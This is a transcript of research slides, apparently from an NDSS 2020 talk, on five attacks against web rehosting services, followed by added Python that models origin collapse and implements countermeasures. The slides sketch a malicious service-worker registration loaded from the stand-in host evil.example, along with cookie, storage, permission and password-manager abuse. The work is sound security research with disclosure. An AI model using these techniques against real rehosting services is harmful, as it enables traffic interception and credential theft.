Melting Pot of Origins: Compromising the Intermediary Web Services that Rehost Websites
Takuya Watanabe, Eitaro Shioji, Mitsuaki Akiyama, Tatsuya Mori
NTT Secure Platform Laboratories, Waseda University, NICT, RIKEN AIP
NDSS Symposium, 24th February 2020
- Study security flaws of web rehosting services
- Present five attacks (e.g., persistent MITM)
- Demonstrate feasibility on real services
- Provide countermeasures
Figure (slide): a web rehosting service fetches page A from its origin server and rehosts it, so the user browses A through the service rather than directly.
Web rehosting services examined (21 in total):
- Web proxies: ProxySite, Hide My Ass!, Hide me, Sitenable Proxy, FilterBypass, ProxFree, toolur, hidester, GenMirror, UnblockVideos, Service-α
- Web translators: Google Translate, Bing Translator, Weblio, PROMT, Yandex.Translate, Baidu Translate, Service-β
- Web archives: Wayback Machine, Google Cache, FreezePage
Example: entering https://google.com in the service's URL form and pressing Browse opens the rehosted copy of the page.
Direct link: https://rehosted.example/?url=https://google.com
Figure (slide): boundary of origins. Browsed directly, sites A and B live at their own origins (a.example and b.example). Rehosted, both are served from rehosted.example and therefore share a single origin.
How rehosting works:
- URL rewriting: https://a.example → https://rehosted.example/?url=https://a.example
- Rehostable file types: HTML, plaintext; JavaScript (except some translators)
- Handling browser resources: resource accesses via JavaScript remain in the rehosted page; the HTTP cookie is relayed (web proxy)
Figure (slide): browsed directly, an attacker's site evil.example is separated from a.example and b.example by the origin boundary. Once evil.example is rehosted as well, it lands inside the same origin as rehosted A and B and can affect both.
Two attack patterns (figures on the slides):
- Persistent MITM: (1) visit rehosted malicious page, (2) register script to browser, (3) visit rehosted pages, (4) intercept requests/responses
- Stored-data theft: (1) visit rehosted pages, (2) store data in browser, (3) visit rehosted malicious page, (4) steal stored data
Demo screenshot text: “You are cracked! Pay 10 BTC”
Service Worker (SW):
- Components: SW script, register page, scoped pages
- Powerful feature in HTML 5.1: intercepts all requests/responses within its scope
- Restrictions: HTTPS, same origin, MIME type (JavaScript)
Example: register page https://a.example/register.html registers sw.js; the scoped pages are https://a.example/*
Attack I: persistent MITM via SW on a web rehosting service
(1) visit rehosted malicious page, (2) register sw.js to browser, (3) visit rehosted pages, (4) intercept requests/responses
Scope: the origin of the web rehosting service, i.e., every rehosted page.
The attacker hosts two files on https://evil.example/:
register.html:
  <script> navigator.serviceWorker.register('sw.js'); </script>
sw.js:
  self.addEventListener('fetch', function(event) { customizeResponse(fetch(event.request)); return; });
(customizeResponse stands in for the attacker's modification of the response; the slide shows a sketch, not complete code.)
Generate the rehosted malicious page: “https://rehosted.example/?url=https://evil.example/register.html”
Problem: the relative script URL resolves to https://rehosted.example/sw.js (404), so the rehosted register page must reference the rehosted script URL instead:
  <script> navigator.serviceWorker.register('https://rehosted.example/?url=https://evil.example/sw.js'); </script>
Case: Google Translate
URL for website translation (a type of web rehosting): https://translate.googleusercontent.com/translate_c?u=https://a.example&...
SW attack works.
URL for uploaded document translation (same origin as website translation): https://translate.googleusercontent.com/translate_f
More in the paper:
- Techniques to rehost SW scripts on web translators
- Discussion of path scope
- Attack using AppCache instead of SW
- Rewriting fallback pages + cookie bomb
Attack: permission reuse (e.g., geolocation, yielding latitude/longitude). The user grants the permission at a rehosted benign page; the permission is reused by a rehosted malicious page, because both are served from rehosted.example.
Attack: password manager abuse. The user logs in to a rehosted benign page and saves the credential in the password manager; the password manager then auto-fills the credential on a fake form of a rehosted malicious page.
Attack: browsing-history theft via cookie/localStorage
1. User visits rehosted page.
2. Page writes cookie or localStorage by using JavaScript:
   document.cookie = "name=value"; localStorage.setItem('name', 'value');
3. Rehosted malicious page retrieves cookie/localStorage.
4. Attacker estimates browsing history by using retrieved data.
Non-identifiable website: has only general cookie names/localStorage keys. Identifiable website: has unique cookie names/localStorage keys (39.1% of Alexa top 10k).
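The following is an added example (not from the paper) that models the origin collapse behind this attack: with separate origins each site's keys are invisible to the others, whereas in one rehosted origin the keys of every visited site merge, and only sites that write a unique key can be told apart. The site names and storage keys are constructed for the example.

```python
# Added example (not from the paper): a model of the origin collapse behind the
# browsing-history theft attack. Site names and storage keys are constructed.

# Constructed sample: keys each site writes via document.cookie / localStorage.setItem.
SITE_KEYS = {
    "shop.example": {"session", "cart_items_v2", "lang"},
    "news.example": {"session", "lang", "_ga"},
    "bank.example": {"session", "bnk_auth_token", "_ga"},
    "blog.example": {"lang", "_ga"},
}


def identifying_keys(site_keys):
    """Map each key written by exactly one site to that site.
    A general key (session, lang, _ga) is shared and identifies nobody."""
    owners = {}
    for site, keys in site_keys.items():
        for key in keys:
            owners.setdefault(key, set()).add(site)
    return {key: next(iter(sites)) for key, sites in owners.items() if len(sites) == 1}


def identifiable_sites(site_keys):
    """Sites with at least one unique key (the 'identifiable website' class)."""
    return set(identifying_keys(site_keys).values())


def identifiable_ratio(site_keys):
    """Share of sites that are identifiable (the paper measured 39.1% over Alexa top 10k)."""
    return len(identifiable_sites(site_keys)) / len(site_keys)


def collapsed_storage(site_keys, visited):
    """Browsed directly, each site's keys sit in its own origin. Rehosted, every
    visited site writes into the single rehosted origin, so the keys merge."""
    merged = set()
    for site in visited:
        merged |= site_keys[site]
    return merged


def sites_revealed(site_keys, observed_keys):
    """Which visited sites the merged key set gives away (step 4 of the attack).
    Only sites with a unique key are revealed; the rest stay ambiguous."""
    unique = identifying_keys(site_keys)
    return {unique[k] for k in observed_keys if k in unique}


if __name__ == "__main__":
    merged = collapsed_storage(SITE_KEYS, ["shop.example", "blog.example"])
    print(sorted(merged))                             # what the rehosted origin now holds
    print(sorted(sites_revealed(SITE_KEYS, merged)))  # ['shop.example']
```

In the sample, blog.example and news.example only write general keys, so a visit to them is not recoverable even though their keys end up in the shared origin.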
Attack V: cookie theft via relayed cookies (web proxy). The cookie written by the origin's HTTP header is relayed under the service's own domain, and the HttpOnly option is lost:
Original cookie (written by HTTP header): Domain .facebook.com, Name xs, Value XXXXXXXXXXXXXXXX, Option HttpOnly
Relayed cookie (written by HTTP header): Domain .rehosted.example, Name c[facebook.com][/][xs], Value XXXXXXXXXXXXXXXX, Option None
Evaluation table legend (per-service results are in the paper): - Vulnerable, ○ Secure
Countermeasures:
- Separate domain names for each rehosted page: https://rehosted.example/?url=a.example → https://a-example.rehosted.example/
- Generate tentative URLs inaccessible by a third party (inhibit direct links)
- Disable SW and AppCache (attack I)
- Use HttpOnly on relayed cookies (attack V)
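To make the first and last countermeasures concrete, here is an added example in Python that is neither the paper's code nor any service's implementation: it rewrites a rehosted URL onto a per-site subdomain so the browser keeps separate origins, and relays an upstream Set-Cookie header without dropping HttpOnly. rehosted.example is the slides' placeholder service domain; the hyphen-doubling host encoding and the helper names are my assumptions.

```python
# Added example (not the paper's or any service's code): two countermeasures from
# the slide. (1) Put each rehosted site on its own subdomain so origins stay separate;
# the hyphen-doubling host encoding is an assumption chosen so that a-b.example and
# a.b.example cannot collide. (2) Relay an upstream Set-Cookie header without dropping
# HttpOnly, the flag lost in attack V. SERVICE_DOMAIN is the slides' placeholder.
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

SERVICE_DOMAIN = "rehosted.example"


def encode_host(host):
    """a-b.example -> a--b-example ; a.b.example -> a-b-example (reversible)."""
    return host.replace("-", "--").replace(".", "-")


def decode_host(label):
    """Inverse of encode_host: '--' is a literal hyphen, a single '-' is a dot."""
    out, i = [], 0
    while i < len(label):
        if label.startswith("--", i):
            out.append("-"); i += 2
        elif label[i] == "-":
            out.append("."); i += 1
        else:
            out.append(label[i]); i += 1
    return "".join(out)


def isolate_url(target):
    """https://a.example/p?q -> https://a-example.rehosted.example/p?q"""
    p = urlsplit(target)
    url = f"https://{encode_host(p.hostname)}.{SERVICE_DOMAIN}{p.path or '/'}"
    return url + (f"?{p.query}" if p.query else "")


def relay_set_cookie(set_cookie_header, upstream_host):
    """Rewrite one upstream Set-Cookie header for the isolated subdomain, keeping HttpOnly
    when the origin set it (JavaScript still cannot read it) and forcing Secure (HTTPS only)."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    out = []
    for name, morsel in jar.items():
        nm = SimpleCookie()
        nm[name] = morsel.value
        nm[name]["domain"] = f"{encode_host(upstream_host)}.{SERVICE_DOMAIN}"
        nm[name]["path"] = morsel["path"] or "/"
        nm[name]["httponly"] = morsel["httponly"]   # preserved, not dropped as in attack V
        nm[name]["secure"] = True
        out.append(nm[name].OutputString())
    return out
```

With the per-site subdomain, a cookie relayed for facebook.com is scoped to facebook-com.rehosted.example and is not sent to, or readable by, a rehosted page of any other site.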
Responsible disclosure:
- We reported to the affected service providers we examined.
- We plan to make the risks more widely known in cooperation with JPCERT/CC.
- 9 providers responded; 4 providers acknowledged it as a vulnerability; 2 providers asked us not to name them.
Future work:
- Other web rehosting services? Other attacks? e.g., iframe [Lerner_CCS'17], persistent XSS [Steffens_NDSS'19]
- Human behaviors while using web rehosting: private browsing, login, permission
Conclusion:
- Explored security flaws of web rehosting services
- Presented 5 attacks exploiting various web features
- Found that 18 out of 21 services are vulnerable
- Reported the risk to service providers together with feasible defenses